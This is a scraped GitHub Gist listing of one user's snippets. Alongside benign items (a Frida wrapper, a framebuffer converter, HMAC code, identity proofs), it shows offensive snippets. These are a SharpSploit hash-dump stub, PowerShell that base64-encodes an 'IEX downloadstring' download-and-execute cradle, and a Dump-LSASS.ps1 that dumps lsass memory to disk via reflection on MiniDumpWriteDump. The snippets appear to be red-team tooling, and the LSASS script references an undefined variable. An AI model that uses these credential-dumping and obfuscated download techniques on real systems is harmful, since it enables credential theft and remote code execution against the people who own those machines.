Skip to content

Instantly share code, notes, and snippets.

View HashCap.cs
using System;
using SharpSploit.Credentials;
using System.Management;
using System.IO;
class SMBDumpHash
static void Main(string[] args)
if (args.Length == 0)
View base64 Powershell encoding
PS C:\Users\User> $Text = "IEX ((new-object net.webclient).downloadstring(''))"
PS C:\Users\User> $Bytes = [System.Text.Encoding]::Unicode.getBytes($Text)
PS C:\Users\User> $EncodedText = [Convert]::ToBase64String($Bytes)
PS C:\Users\User> $EncodedText
View gist:b832ffe4a1e6771031762f2e23ac7b23
Verifying my Blockstack ID is secured with the address 12Xp1RVeuUfSnCyuEwpoSa8q8hXtAsKXzr
T0w3ntum /
Created Mar 7, 2018
Wrapper to call Frida scripts
import frida
import sys
scriptname = sys.argv[1]
procname = sys.argv[2]
fd = open(scriptname, "r")
def on_message(message, data):
T0w3ntum / Framebuffer to PNG
Created Feb 20, 2018 — forked from JakubVanek/ Framebuffer to PNG
Convert raw BGRA framebuffer to RGB png file
View Framebuffer to PNG
This program can be used to convert raw BGRA 8888 framebuffer to standard PNG file.
import hashlib
import hmac
import sys
secret = sys.argv[2]
message = bytes(sys.argv[1]).encode('utf-8')
secret = bytes(secret).encode('utf-8')
hash =, message, hashlib.sha256)

Keybase proof

I hereby claim:

  • I am t0w3ntum on github.
  • I am t0w3ntum ( on keybase.
  • I have a public key whose fingerprint is 4753 72D7 AD1B 6C4B EBA7 B397 FED5 6B8C F90E 6B82

To claim this, I am signing this object:

View Dump-LSASS.ps1
$LSASSProc = Get-Process lsass
$FileStream = New-Object IO.FileStream('c:\lsass.dmp', [IO.FileMode]::Create)
$Result = ((([PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')).GetNestedType('NativeMethods', 'NonPublic')).GetMethod('MiniDumpWriteDump', ([Reflection.BindingFlags] 'NonPublic, Static'))).Invoke($null,@($proc.Handle,$proc.Id,$FileStream.SafeFileHandle,[UInt32] 2,[IntPtr]::Zero,[IntPtr]::Zero,[IntPtr]::Zero))